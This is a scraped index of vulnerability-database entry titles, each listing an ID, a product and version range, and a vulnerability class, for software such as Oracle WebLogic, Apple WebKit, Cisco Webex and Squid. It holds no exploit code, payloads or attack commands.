McAfee Web Gateway up to 9.2.0 Access Control Password privilege escalation [161278] IBM Business Automation Workflow 8.0/8.5/8.6 Web UI cross site scripting [161221] GitLab up to 13.1.9/13.2.7/13.3.3 Webhook denial of service [161195] SoftradeWeb SNC WP SMART CRM 1.8.7 on WordPress cross site scripting [161131] Philips Patient Information Center iX Web Application cross site scripting [161106] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 Web UI cross site scripting [161087] Yaws Web Server up to 2.0.7 CGI privilege escalation [161086] Yaws Web Server up to 2.0.7 WebDAV XML External Entity [160988] Palo Alto PAN-OS up to 8.1.14/9.0.8/9.1.2 Authentication Interface memory corruption [160986] Palo Alto PAN-OS up to 9.0.9/9.1.3/10.0.0 Management Interface privilege escalation [160985] Palo Alto PAN-OS up to 8.1.15/9.0.9/9.1.2 Management Interface privilege escalation [160981] Red Hat JBossWeb up to 7.5.31 WebSocket denial of service [160976] IBM Business Process Manager Web UI Stored cross site scripting [160975] IBM Business Process Manager Web UI cross site scripting [160852] Microsoft SharePoint Enterprise Server 2010 SP2/2013 SP1/2016/2019 ASP.Net Web Control privilege escalation [160753] IBM InfoSphere Information Server 11.7 Web UI Stored cross site scripting [160743] Cisco Webex Training Meeting privilege escalation [160670] Enghouse Web Chat 6.2.284.34 cross site scripting [160621] Squid Web Proxy up to 4.12/5.0.3 Cache privilege escalation [160620] Squid Web Proxy up to 4.12/5.0.3 Header Parsing privilege escalation [160406] IBM WebSphere Application Server ND High Availability Deployment Manager cross site scripting [160402] IBM Security Guardium Insights 2.0.1 Web Page information disclosure [160369] Webexcels Ecommerce CMS 2.x/2017/2018/2019/2020 content.php sql injection [160368] Webexcels Ecommerce CMS 2.x/2017/2018/2019/2020 search.php cross site scripting [160315] IBM Security Guardium Data Encryption 3.0.0.2 Web UI cross site scripting [160295] Etoile Web Design Ultimate Appointment Booking / Scheduling Plugin up to 1.1.9 on WordPress Reflected cross site scripting [160212] Squid Web Proxy up to 4.12/5.0.3 Locking peer_digest.cc peerDigestHandleReply denial of service [160103] Cisco Webex Meetings Desktop App on Windows directory traversal [160004] Cisco Webex Meeting Contacts information disclosure [159995] Cisco Webex Meeting Scheduled Meeting Template privilege escalation [159994] Cisco Webex Meeting Scheduled Meeting Template privilege escalation [159991] Cisco Unified Communications Manager Web UI cross site scripting [159933] Siemens SICAM WEB firmware for SICAM A8000 RTU Login Screen Log cross site scripting [159906] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 privilege escalation [159890] Apple iCloud up to 11.2 on Windows WebKit Page Loading weak authentication [159889] Apple iCloud up to 11.2 on Windows WebKit privilege escalation [159888] Apple iCloud up to 11.2 on Windows WebKit memory corruption [159887] Apple iCloud up to 11.2 on Windows WebKit memory corruption [159886] Apple iCloud up to 11.2 on Windows WebKit Universal cross site scripting [159885] Apple iCloud up to 11.2 on Windows WebKit CSP privilege escalation [159884] Apple iCloud up to 11.2 on Windows WebKit memory corruption [159870] Apple iCloud up to 7.19 on Windows WebKit Page Loading weak authentication [159869] Apple iCloud up to 7.19 on Windows WebKit privilege escalation [159868] Apple iCloud up to 7.19 on Windows WebKit memory corruption [159867] Apple iCloud up to 7.19 on Windows WebKit memory corruption [159866] Apple iCloud up to 7.19 on Windows WebKit Universal cross site scripting [159865] Apple iCloud up to 7.19 on Windows WebKit CSP privilege escalation [159864] Apple iCloud up to 7.19 on Windows WebKit memory corruption [159729] BlackBerry QNX Software Development Platform up to 6.6.0 Slinger Web Server privilege escalation [159726] SAP NetWeaver AS JAVA up to 7.50 Web Service denial of service [159703] Artica Web Proxy 4.30.00000000 Privileges fw.login.php sql injection [159702] Artica Web Proxy 4.30.000000 cyrus.php privilege escalation [159639] Teradici Cloud Access Connector up to 16 Management Interface Stored cross site scripting [159638] Teradici Cloud Access Connector up to 15 Management Interface Credentials unknown vulnerability [159446] IBM Jazz Reporting Service 7.0/7.0.1 Web UI cross site scripting [159445] IBM Jazz Reporting Service 6.0.2/6.0.6/6.0.6.1/7.0/7.0.1 Web UI cross site scripting [159444] IBM Jazz Reporting Service 6.0.6/6.0.6.1/7.0 Web UI cross site scripting [159430] SialWeb CMS Search cross site scripting [159429] SialWeb CMS /about.php sql injection [159379] TP-LINK TL-PS310U Web Administration weak authentication [159360] Advantech WebAccess HMI Designer up to 2.1.9.31 privilege escalation [159354] Advantech WebAccess HMI Designer up to 2.1.9.31 memory corruption [159353] Advantech WebAccess HMI Designer up to 2.1.9.31 memory corruption [159352] Advantech WebAccess HMI Designer up to 2.1.9.31 memory corruption [159351] Advantech WebAccess HMI Designer up to 2.1.9.31 information disclosure [159350] Advantech WebAccess HMI Designer up to 2.1.9.31 memory corruption [159310] IBM Jazz Foundation/Engineering Web UI cross site scripting [159309] IBM Jazz Foundation/Engineering Web UI cross site scripting [159306] IBM Jazz Foundation/Engineering Web UI cross site scripting [159296] Cohesive Networks VNS3:vpn up to 4.11.0 Administrative Interface privilege escalation [159268] IBM Financial Transaction Manager 3.2.4 Web UI cross site scripting [158984] Parallels Remote Application Server up to 17.1.1 Web Application privilege escalation [158875] D-Link DIR-816L webinc/js/info.php cross site scripting [158747] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 SOAP Connector privilege escalation [158725] Cisco SD-WAN vManage Web UI XML External Entity [158708] Cisco Webex Meetings/WebEx Meetings Server privilege escalation [158642] Apple tvOS up to 13.4.7 WebKit Page Loading weak authentication [158641] Apple tvOS up to 13.4.7 WebKit privilege escalation [158640] Apple tvOS up to 13.4.7 WebKit memory corruption [158639] Apple tvOS up to 13.4.7 WebKit memory corruption [158638] Apple tvOS up to 13.4.7 WebKit Universal cross site scripting [158637] Apple tvOS up to 13.4.7 WebKit Content Security Policy privilege escalation [158636] Apple tvOS up to 13.4.7 WebKit memory corruption [158622] Apple watchOS up to 6.2.7 WebKit Page Loading weak authentication [158620] Apple watchOS up to 6.2.7 WebKit memory corruption [158619] Apple watchOS up to 6.2.7 WebKit memory corruption [158618] Apple watchOS up to 6.2.7 WebKit Universal cross site scripting [158617] Apple watchOS up to 6.2.7 WebKit Content Security Policy privilege escalation [158616] Apple watchOS up to 6.2.7 WebKit memory corruption [158569] McAfee Web Gateway up to 9.2.0 privilege escalation [158536] Moxa EDR-G902/EDR-G903 up to 5.3 Web Server memory corruption [158355] Oracle JD Edwards EnterpriseOne Tools up to 9.2.4 Web Runtime privilege escalation [158327] Oracle Health Sciences Empirica Signal 7.3.3 Web server privilege escalation [158326] Oracle Health Sciences Empirica Inspections 1.0.1.2 Web server privilege escalation [158321] Oracle Business Intelligence Enterprise Edition 12.2.1.3.0/12.2.1.4.0 Analytics Web General information disclosure [158319] Oracle WebLogic Server Core information disclosure [158318] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0/12.2.1.4.0 Console unknown vulnerability [158315] Oracle WebLogic Server 12.1.3.0.0/12.2.1.3.0/12.2.1.4.0/14.1.1.0.0 Sample apps unknown vulnerability [158314] Oracle WebLogic Server 12.1.3.0.0/12.2.1.3.0/12.2.1.4.0/14.1.1.0.0 Sample apps unknown vulnerability [158313] Oracle WebLogic Server 12.1.3.0.0/12.2.1.3.0/12.2.1.4.0/14.1.1.0.0 Sample apps unknown vulnerability [158312] Oracle WebLogic Server 12.1.3.0.0/12.2.1.3.0/12.2.1.4.0/14.1.1.0.0 Sample apps unknown vulnerability [158311] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0/12.2.1.4.0 Console unknown vulnerability [158306] Oracle WebLogic Server Core unknown vulnerability [158304] Oracle WebLogic Server 12.1.3.0.0/12.2.1.3.0/12.2.1.4.0/14.1.1.0.0 Web Container unknown vulnerability [158303] Oracle WebCenter Portal 11.1.1.9.0/12.2.1.3.0/12.2.1.4.0 Security Framework information disclosure [158299] Oracle WebLogic Server Web Services information disclosure [158298] Oracle WebLogic Server Web Container denial of service [158297] Oracle WebLogic Server 12.2.1.3.0/12.2.1.4.0 Sample apps information disclosure [158296] Oracle WebLogic Server 12.1.3.0.0/12.2.1.3.0/12.2.1.4.0/14.1.1.0.0 Sample apps information disclosure [158295] Oracle WebCenter Portal 12.2.1.3.0 WebCenter Spaces Application privilege escalation [158291] Oracle Business Intelligence Enterprise Edition 5.5.0.0.0/11.1.1.9.0/12.2.1.3.0/12.2.1.4.0 Analytics Web General unknown vulnerability [158290] Oracle WebLogic Server Web Container unknown vulnerability [158284] Oracle WebCenter Portal 12.2.1.3.0/12.2.1.4.0 Composer denial of service [158283] Oracle Business Intelligence Enterprise Edition 5.5.0.0.0/11.1.1.9.0/12.2.1.3.0/12.2.1.4.0 Analytics Web Answers denial of service [158279] Oracle WebLogic Server Console privilege escalation [158278] Oracle WebLogic Server 12.2.1.3.0/12.2.1.4.0/14.1.1.0.0 Centralized Thirdparty Jars privilege escalation [158277] Oracle WebLogic Server 12.2.1.3.0/12.2.1.4.0/14.1.1.0.0 Core unknown vulnerability [158276] Oracle WebLogic Server Core unknown vulnerability [158275] Oracle WebLogic Server 12.2.1.3.0/12.2.1.4.0/14.1.1.0.0 Core unknown vulnerability [158274] Oracle WebLogic Server 12.2.1.3.0/12.2.1.4.0/14.1.1.0.0 Core unknown vulnerability [158273] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0/12.2.1.4.0 Security Service information disclosure [158272] Oracle WebLogic Server 12.2.1.3.0/12.2.1.4.0 Centralized Thirdparty Jars privilege escalation [158271] Oracle WebCenter Portal 12.2.1.3.0/12.2.1.4.0 Security Framework privilege escalation [158258] Oracle 8.0.4 User Interface cross site scripting [158255] Oracle Banking Platform up to 2.10.0 User Interface cross site scripting [158254] Oracle Banking Enterprise Collections 2.7.0/2.8.0 User Interface cross site scripting [158252] Oracle Insurance Accounting Analyzer 8.0.6/8.0.7/8.0.8/8.0.9 User Interface unknown vulnerability [158251] Oracle Financial Services Loan Loss Forecasting 8.0.6/8.0.7/8.0.8 User Interface unknown vulnerability [158248] Oracle Financial Services Liquidity Risk Management 8.0.6 User Interface unknown vulnerability [158242] Oracle 8.0.6/8.0.7/8.0.8 Web Service to Regulatory Report privilege escalation [158235] Oracle Insurance Accounting Analyzer 8.0.6/8.0.7/8.0.8 User Interface cross site scripting [158232] Oracle Financial Services Market Risk Measurement 8.0.6/8.0.8 User Interface privilege escalation [158224] Oracle Application Testing Suite 13.2.0.1/13.3.0.1 Load Testing for Web Apps cross site scripting [158215] Oracle Application Testing Suite 13.3.0.1 Load Testing for Web Apps privilege escalation [158178] Oracle up to 16.2.20.1/17.12.17.1/18.8.18.2 Web Access unknown vulnerability [158173] Oracle up to 17.12.17.1/18.8.19/19.12.5 Web Access unknown vulnerability [158168] Oracle up to 19.12.6 Web Access privilege escalation [158165] Oracle up to 16.2.20.1/17.12.17.1/18.8.19/19.12.6 Web Access XML External Entity [158149] Oracle Communications Session Route Manager 8.1.1/8.2.0/8.2.1 User Interface cross site scripting [158147] Oracle Communications Session Report Manager 8.1.1/8.2.0/8.2.1 User Interface cross site scripting [158142] Oracle Communications Element Manager 8.1.1/8.2.0/8.2.1 User Interface cross site scripting [158131] Oracle Communications Operations Monitor 3.4/4.1/4.2/4.3 VSP implementing webserver privilege escalation [158117] Oracle Communications Network Integrity 7.3.2/7.3.3/7.3.4/7.3.5/7.3.6 User Interface unknown vulnerability [158047] IBM QRadar SIEM 7.3/7.4 Web UI cross site scripting [158043] IBM QRadar SIEM 7.3/7.4 Web UI cross site scripting [158027] Apache Tomcat up to 7.0.104/8.5.56/9.0.36/10.0.0-M6 WebSocket Frame denial of service [157902] Microsoft Office Online Server/Office Web Apps cross site scripting [157771] Palo Alto PAN-OS up to 7.x/8.0.x/8.1.14 Management Interface privilege escalation [157647] Atlassian JIRA Server/Data Center up to 8.8.0 Web Resources Manager privilege escalation [157629] Nginx Controller up to 1.0.1/2.8.x/3.4.x User Interface weak authentication [157596] Synacor Zimbra Collaboration Suite up to 8.8.15 Patch 10 WebMail Reflected cross site scripting [157575] F5 BIG-IP up to 12.1.5.1/13.1.3.3/14.1.2.5/15.1.0.3 Traffic Management User Interface cross site request forgery [157571] Nginx Controller up to 1.0.1/2.9.0/3.4.0 User Interface cross site request forgery [157538] PowerDNS Recursor up to 4.1.16/4.2.2/4.3.1 Web Server privilege escalation [157492] Squid Web Proxy up to 4.11/5.0.2 ContentLengthInterpreter.cc privilege escalation [157487] Squid Web Proxy up to 5.2 Synchronization Ipc::Mem::PageStack::pop unknown vulnerability [157486] Squid Web Proxy up to 4.11/5.0.2 Certificate Validation Helper denial of service [157463] IBM Business Automation Workflow Web UI cross site scripting [157334] IBM Maximo Asset Management 7.6.0.10/7.6.1.1 Web UI cross site scripting [157204] Xiaomi Mi Jia Ink-Jet Printer up to 3.4.5 Web Management privilege escalation [157165] OSIsoft PI Web API up to 2019 Patch 1 cross site scripting [157113] WebFOCUS Business Intelligence 8.0 SP6 /ibi_apps/WFServlet.cfg XML External Entity [157112] WebFOCUS Business Intelligence 8.0 WFServlet(.ibfs) cross site request forgery [157111] WebFOCUS Business Intelligence 8.0 cross site scripting [157040] CMS Made Simple 2.2.14 moduleinterface.php cross site scripting [156929] Python up to 3.8.3 Lib/ipaddress.py IPv4Interface/IPv6Interface denial of service [156911] Cisco IOS XR Gigabit Ethernet Management Interface privilege escalation [156909] Cisco Webex Meetings/WebEx Meetings Server weak authentication [156902] Cisco Webex Meetings Desktop App on macOS Software Update weak authentication [156880] Cisco Webex Meetings Desktop App privilege escalation [156732] Advantech WebAccess Node up to 8.4.4 memory corruption [156673] IBM API Connect up to 5.0.8.8 Web UI cross site scripting [156328] Microsoft SharePoint Foundation ASP.Net Web Control privilege escalation [156238] IBM WebSphere Application Server 8.5/9.0 privilege escalation [156237] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 information disclosure [156236] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 Network Deployment privilege escalation [156131] IBM Security Guardium 11.1 Web UI cross site scripting [156079] IBM Security Guardium 11.1 Web UI cross site scripting [156071] Cisco WebEx Network Recording Player/Webex Player ARF File privilege escalation [156070] Cisco WebEx Network Recording Player/Webex Player ARF File privilege escalation [156069] Cisco WebEx Network Recording Player/Webex Player ARF File privilege escalation [156046] Cisco IOS XE Web UI privilege escalation [156012] Navigate CMS up to 2.8.7 website.class.php cross site scripting [155996] Synacor Zimbra up to 8.8.15 Patch 9/9.0.0 Patch 2 Webmail Subsystem /service/upload privilege escalation [155985] websocket-extensions up to 0.1.4 on Ruby Regex privilege escalation [155805] Apple iCloud up to 7.18/11.1 on Windows WebKit memory corruption [155804] Apple iCloud up to 7.18/11.1 on Windows WebKit cross site scripting [155803] Apple iCloud up to 7.18/11.1 on Windows WebKit privilege escalation [155802] Apple iCloud up to 7.18/11.1 on Windows WebKit memory corruption [155801] Apple iCloud up to 7.18/11.1 on Windows WebKit memory corruption [155800] Apple iCloud up to 7.18/11.1 on Windows WebKit privilege escalation [155799] Apple iCloud up to 7.18/11.1 on Windows WebKit Universal cross site scripting [155798] Apple iCloud up to 7.18/11.1 on Windows WebKit privilege escalation [155737] Apple tvOS up to 13.4.4 WebRTC memory corruption [155736] Apple tvOS up to 13.4.4 WebKit privilege escalation [155735] Apple tvOS up to 13.4.4 WebKit memory corruption [155734] Apple tvOS up to 13.4.4 WebKit memory corruption [155733] Apple tvOS up to 13.4.4 WebKit memory corruption [155732] Apple tvOS up to 13.4.4 WebKit cross site scripting [155731] Apple tvOS up to 13.4.4 WebKit privilege escalation [155730] Apple tvOS up to 13.4.4 WebKit privilege escalation [155729] Apple tvOS up to 13.4.4 WebKit Universal cross site scripting [155704] Apple watchOS up to 6.2.4 WebRTC information disclosure [155703] Apple watchOS up to 6.2.4 WebKit privilege escalation [155702] Apple watchOS up to 6.2.4 WebKit memory corruption [155701] Apple watchOS up to 6.2.4 WebKit memory corruption [155700] Apple watchOS up to 6.2.4 WebKit memory corruption [155699] Apple watchOS up to 6.2.4 WebKit cross site scripting [155698] Apple watchOS up to 6.2.4 WebKit privilege escalation [155697] Apple watchOS up to 6.2.4 WebKit privilege escalation [155696] Apple watchOS up to 6.2.4 WebKit Universal cross site scripting [155663] IBM Jazz Reporting Service 6.0.6/6.0.6.1/7.0 Web UI cross site scripting [155643] Trend Micro InterScan Web Security Virtual Appliance 6.5 weak authentication [155642] Trend Micro InterScan Web Security Virtual Appliance 6.5 privilege escalation [155641] Trend Micro InterScan Web Security Virtual Appliance 6.5 information disclosure [155433] IBM InfoSphere Information Server 11.3/11.5/11.7 Web UI cross site scripting [155418] Horde Groupware Webmail Edition up to 5.2.21 Image View Stored cross site scripting [155391] Netgear AC3000/SRS60/SRR60/RBS50Y V2.5.1.106 Administration SOAP Interface privilege escalation [155390] Netgear AC3000/SRS60/SRR60/RBS50Y V2.5.1.106 SOAP Interface Key information disclosure [155377] Readdle Documents App up to 6.9.6 on iOS WebSocket Server privilege escalation [155305] IBM WebSphere Application Server 8.5 privilege escalation [155288] Apache ActiveMQ up to 5.15.11 Webconsole Admin GUI cross site scripting [155283] Progress MOVEit Automation Web Admin Application cross site scripting [155237] TYPO3 CMS up to 9.5.16/10.4.1 Backend User Interface cross site request forgery [155227] IBM Sterling B2B Integrator Standard Edition up to 6.0.3.1 Web Page Cache information disclosure [155218] Palo Alto PAN-OS up to 7.1.x/8.1.12/9.0.6 Management Interface XML External Entity [155216] Palo Alto PAN-OS up to 7.1.x/8.1.13/9.0.6 Management Interface privilege escalation [155207] Palo Alto PAN-OS up to 7.1.x/8.0.20/8.1.11/9.0.5 Management Interface memory corruption [155069] Microsoft SharePoint Enterprise Server 2013 SP1/2016/2019 ASP.Net Web Control memory corruption [154971] Oracle iPlanet Web Server 7.0.x Administration Console weak encryption [154970] Oracle iPlanet Web Server 7.0.x Administration Console privilege escalation [154938] Advantech WebAccess Node up to 8.4.4/9.0.0 directory traversal [154937] Advantech WebAccess Node up to 8.4.4/9.0.0 memory corruption [154936] Advantech WebAccess Node up to 8.4.4/9.0.0 information disclosure [154935] Advantech WebAccess Node up to 8.4.4/9.0.0 sql injection [154934] Advantech WebAccess Node up to 8.4.4/9.0.0 directory traversal [154933] Advantech WebAccess Node up to 8.4.4/9.0.0 directory traversal [154932] Advantech WebAccess Node up to 8.4.4/9.0.0 memory corruption [154925] Advantech WebAccess Node up to 8.4.4/9.0.0 memory corruption [154879] Java-WebSocket up to 1.4.1 Certificate Validation weak authentication [154857] Nginx Controller up to 3.3.0 Web Server Logout weak authentication [154832] IBM WebSphere Application Liberty up to 20.0.0.4 openidconnect weak authentication [154831] IBM InfoSphere Information Server 11.3/11.5/11.7 Web UI cross site scripting [154829] Cisco ASA/Firepower Threat Defense Management Interface denial of service [154819] Cisco FirePOWER Management Center Web UI privilege escalation [154815] Cisco FirePOWER Management Center Web UI privilege escalation [154800] Cisco Firepower Threat Defense Remote Management Interface denial of service [154798] Cisco Firepower Threat Defense Management Interface privilege escalation [154740] Synacor Zimbra 9.0 Web Client cross site scripting [154715] OpenVPN Access Server up to 2.6.x/2.8.2 Management Interface XML Entity Expansion [154524] IBM WebSphere Application Server/Liberty information disclosure [154311] Squid Web Proxy up to 5.0.1 Digest Authentication Nonce handler memory corruption [154165] IQrouter up to 3.3.1 web-panel information disclosure [154048] IBM Maximo Asset Management 7.6 Web UI cross site scripting [154047] IBM Maximo Asset Management 7.6 Web UI cross site scripting [153830] IBM QRadar up to 7.3.3 Patch 2 Web UI cross site scripting [153813] Cisco WebEx Network Recording Player/Webex Player ARF memory corruption [153810] Cisco IP Phone Web Server privilege escalation [153809] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0/12.2.1.4.0 privilege escalation [153691] Squid Web Proxy up to 4.7 weak authentication [153690] Squid Web Proxy up to 4.7 privilege escalation [153689] Squid Web Proxy up to 4.7 ESI Parser memory corruption [153688] Squid Web Proxy up to 4.7/5.0 Cache privilege escalation [153687] Squid Web Proxy up to 4.7 ESI ESIExpression::Evaluate memory corruption [153559] Oracle Knowledge up to 8.6.3 Web Applications cross site scripting [153558] Oracle Knowledge up to 8.6.3 Information Manager Console/Web Applications cross site scripting [153553] Oracle Knowledge up to 8.6.3 Web Applications privilege escalation [153551] Oracle Knowledge up to 8.6.3 Web Applications denial of service [153550] Oracle Knowledge up to 8.6.3 Web Applications unknown vulnerability [153549] Oracle Knowledge up to 8.6.3 Information Manager Console/Web Applications privilege escalation [153528] Oracle Hyperion Financial Reporting 11.1.2.4 Web Based Report Designer information disclosure [153518] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0/12.2.1.4.0 Console unknown vulnerability [153513] Oracle WebLogic Server 10.3.6.0.0 Management Services information disclosure [153512] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0/12.2.1.4.0 Console information disclosure [153505] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0/12.2.1.4.0 Console unknown vulnerability [153504] Oracle WebCenter Sites 12.2.1.3.0 Advanced UI cross site scripting [153500] Oracle HTTP Server 11.1.1.9.0 Web Listener unknown vulnerability [153499] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0/12.2.1.4.0 WLS Web Services unknown vulnerability [153494] Oracle WebCenter Sites 12.2.1.3.0 Advanced UI information disclosure [153493] Oracle WebLogic Server 10.3.6.0.0 WLS Web Services information disclosure [153492] Oracle WebCenter Portal 11.1.1.9.0/12.2.1.3.0/12.2.1.4.0 Security Framework denial of service [153482] Oracle WebLogic Server 12.1.3.0.0/12.2.1.3.0/12.2.1.4.0 Web Container unknown vulnerability [153481] Oracle HTTP Server 11.1.1.9.0 Web Listener memory corruption [153479] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0/12.2.1.4.0 Core unknown vulnerability [153478] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0/12.2.1.4.0 Core unknown vulnerability [153477] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0/12.2.1.4.0 Core unknown vulnerability [153476] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0 Console privilege escalation [153475] Oracle WebCenter Sites 12.2.1.3.0/12.2.1.4.0 privilege escalation [153474] Oracle WebCenter Portal 12.2.1.3.0/12.2.1.4.0 Security Framework privilege escalation [153468] Oracle Business Intelligence Enterprise Edition 5.5.0.0.0/11.1.1.9.0/12.2.1.3.0/12.2.1.4.0 Analytics Web General unknown vulnerability [153458] Oracle Insurance Accounting Analyzer 8.0.6/8.0.7/8.0.8/8.0.9 User Interface unknown vulnerability [153457] Oracle Financial Services Profitability Management 8.0.6/8.0.7 User Interface unknown vulnerability [153456] Oracle Financial Services Price Creation/Discovery 8.0.7 User Interface unknown vulnerability [153455] Oracle Financial Services Loan Loss Forecasting 8.0.6/8.0.7/8.0.8 User Interface unknown vulnerability [153454] Oracle Financial Services Liquidity Risk Measurement 8.0.7/8.0.8 User Interface unknown vulnerability [153453] Oracle Financial Services Liquidity Risk Management 8.0.6 User Interfaces unknown vulnerability [153452] Oracle Financial Services Hedge Management 8.0.6/8.0.7/8.0.8 User Interface unknown vulnerability [153451] Oracle Financial Services Funds Transfer Pricing 8.0.6/8.0.7 User Interface unknown vulnerability [153450] Oracle 8.0.7/8.0.8 User Interfaces unknown vulnerability [153449] Oracle Financial Services Data Foundation 8.0.6/8.0.7/8.0.8/8.0.9 User Interface unknown vulnerability [153448] Oracle Financial Services Balance Sheet Planning 8.0.8 User Interface unknown vulnerability [153447] Oracle Financial Services Asset Liability Management 8.0.6/8.0.7 User Interface unknown vulnerability [153334] Oracle Communications Operations Monitor 3.4.0/4.0.0/4.1.0/4.2.0/4.3.0 VSP Webserver privilege escalation [153332] Oracle Communications WebRTC Session Controller 7.2 WSC-Console cross site scripting [153315] Oracle Communications ASAP Cartridges 7.2/7.3 Web Service privilege escalation [153158] SAP Business Intelligence Platform 4.1/4.2 dswsbobje Web Application information disclosure [153075] Cisco Webex Meeting Multimedia Viewer privilege escalation [153066] Cisco Webex Business Suite up to 39.0 weak authentication [153036] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 SOAP Connector privilege escalation [153016] Advantech WebAccess/NMS up to 3.0.1 directory traversal [153015] Advantech WebAccess/NMS up to 3.0.1 XML Data XML External Entity [153014] Advantech WebAccess/NMS up to 3.0.1 weak authentication [153013] Advantech WebAccess/NMS up to 3.0.1 sql injection [153012] Advantech WebAccess/NMS up to 3.0.1 File Upload privilege escalation [153011] Advantech WebAccess/NMS up to 3.0.1 directory traversal [153010] Advantech WebAccess/NMS up to 3.0.1 sql injection [153009] Advantech WebAccess/NMS up to 3.0.1 privilege escalation [153005] Broadcom ProxySG/ASG Management Interface Session Hijacking weak authentication [152938] GitLab Community Edition/Enterprise Edition up to 12.9 Web UI/GraphQL API information disclosure [152850] Honeywell Notifier Web Server 3.50 directory traversal [152721] IBM WebSphere Application Server Liberty up to 20.0.0.3 Web UI cross site scripting [152720] IBM WebSphere Application Server Liberty up to 20.0.0.3 Web UI cross site scripting [152683] Tiki-Wiki CMS up to 20.0 Web Page cross site scripting [152656] pfSense up to 2.4.4 WebGUI system_usermanager_addprivs.php Stored cross site scripting [152634] Advantech WebAccess 8.3.4 RPC privilege escalation [152629] Apple iCloud up to 7.17 on Windows WebKit Page Loading Incorrect Control Flow [152628] Apple iCloud up to 7.17 on Windows WebKit cross site scripting [152627] Apple iCloud up to 7.17 on Windows WebKit denial of service [152626] Apple iCloud up to 7.17 on Windows WebKit privilege escalation [152625] Apple iCloud up to 7.17 on Windows WebKit memory corruption [152624] Apple iCloud up to 7.17 on Windows WebKit race condition [152623] Apple iCloud up to 7.17 on Windows WebKit memory corruption [152622] Apple iCloud up to 7.17 on Windows WebKit memory corruption [152621] Apple iCloud up to 7.17 on Windows WebKit privilege escalation [152620] Apple iCloud up to 7.17 on Windows WebKit privilege escalation [152616] Apple iCloud up to 10.9.2 on Windows WebKit Page Loading Incorrect Control Flow [152615] Apple iCloud up to 10.9.2 on Windows WebKit cross site scripting [152614] Apple iCloud up to 10.9.2 on Windows WebKit denial of service [152613] Apple iCloud up to 10.9.2 on Windows WebKit memory corruption [152612] Apple iCloud up to 10.9.2 on Windows WebKit privilege escalation [152611] Apple iCloud up to 10.9.2 on Windows WebKit race condition [152610] Apple iCloud up to 10.9.2 on Windows WebKit memory corruption [152609] Apple iCloud up to 10.9.2 on Windows WebKit memory corruption [152608] Apple iCloud up to 10.9.2 on Windows WebKit privilege escalation [152607] Apple iCloud up to 10.9.2 on Windows WebKit privilege escalation [152549] Apple watchOS up to 6.1.3 WebKit privilege escalation [152548] Apple watchOS up to 6.1.3 WebKit privilege escalation [152547] Apple watchOS up to 6.1.3 WebKit memory corruption [152546] Apple watchOS up to 6.1.3 WebKit memory corruption [152532] Apple tvOS up to 13.3.1 WebKit Page Loading Incorrect Control Flow [152531] Apple tvOS up to 13.3.1 WebKit privilege escalation [152530] Apple tvOS up to 13.3.1 WebKit memory corruption [152529] Apple tvOS up to 13.3.1 WebKit weak authentication [152528] Apple tvOS up to 13.3.1 WebKit privilege escalation [152527] Apple tvOS up to 13.3.1 WebKit cross site scripting [152526] Apple tvOS up to 13.3.1 WebKit denial of service [152525] Apple tvOS up to 13.3.1 WebKit race condition [152524] Apple tvOS up to 13.3.1 WebKit memory corruption [152523] Apple tvOS up to 13.3.1 WebKit memory corruption [152470] IBM Tivoli Netcool Impact up to 7.1.0.17 Web UI cross site scripting [152396] Advantech WebAccess up to 8.4.2 memory corruption [152386] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 SOAP Connector privilege escalation [152364] SonicWALL SMA1000 up to 12.1.0-06411 HTTP Extraweb Server unknown vulnerability [152253] Moxa EDS-G516E up to 5.2 Web Application weak encryption [152249] Moxa PT-7528/PT-7828 Web Server memory corruption [152241] Notifier Web Server up to 3.50 weak authentication [152181] IBM Tivoli Netcool Impact up to 7.1.0.17 Web UI cross site scripting [152063] Horde Groupware Webmail Edition 5.2.22 add.php privilege escalation [152062] Horde Groupware Webmail Edition 5.2.22 edit.php directory traversal [152054] Schneider Electric Andover Continuum Web Server cross site scripting [152053] Schneider Electric Andover Continuum Web Server cross site scripting [152010] Netgear GS728TPS up to 5.3.0.35 Web Administration Panel weak authentication [151959] Tesla Model 3 up to 2020.4.9 Driving Interface privilege escalation [151953] Squid Web Proxy up to 4.8 cachemgr.cgi privilege escalation [151933] signotec signoPAD-API-Web up to 3.1.0 Websocket denial of service [151931] signotec signoPAD-API-Web up to 3.1.0 on Windows WebSocket privilege escalation [151920] CMS Made Simple 2.2.13 Filemanager moduleinterface.php Stored cross site scripting [151868] Cisco SD-WAN Solution vManage Web UI privilege escalation [151812] Solarwinds Serv-U Managed File Transfer up to 15.1.6 Hotfix 1 Web Client cross site request forgery [151765] cPanel up to 84.0.19 WebMail privilege escalation [151759] cPanel up to 84.0.19 WebDisk UAPI privilege escalation [151754] cPanel up to 82.0.17 WebDAV weak authentication [151747] cPanel up to 82.0.17 WebMail weak authentication [151340] Moxa MGate MB3180 Web Service information disclosure [151338] Moxa MGate MB3180 Web Server weak encryption [151337] Moxa MGate MB3180 Web Server memory corruption [151336] Moxa MGate MB3180 Web Server memory corruption [151276] IBM InfoSphere Information Server 11.5/11.7 Web UI cross site scripting [151228] IBM Tivoli Workload Scheduler 9.3 Web UI cross site scripting [151177] Lexmark C/M/X/6500e Embedded Web Server directory traversal [151147] Microsoft Windows up to Server 2019 Network Driver Interface Specification information disclosure [150968] Lexmark Product Embedded Web Server Stored cross site scripting [150967] Lexmark Product Embedded Web Server Reflected cross site scripting [150867] Cisco Webex Meetings Client on macOS mDNS information disclosure [150860] 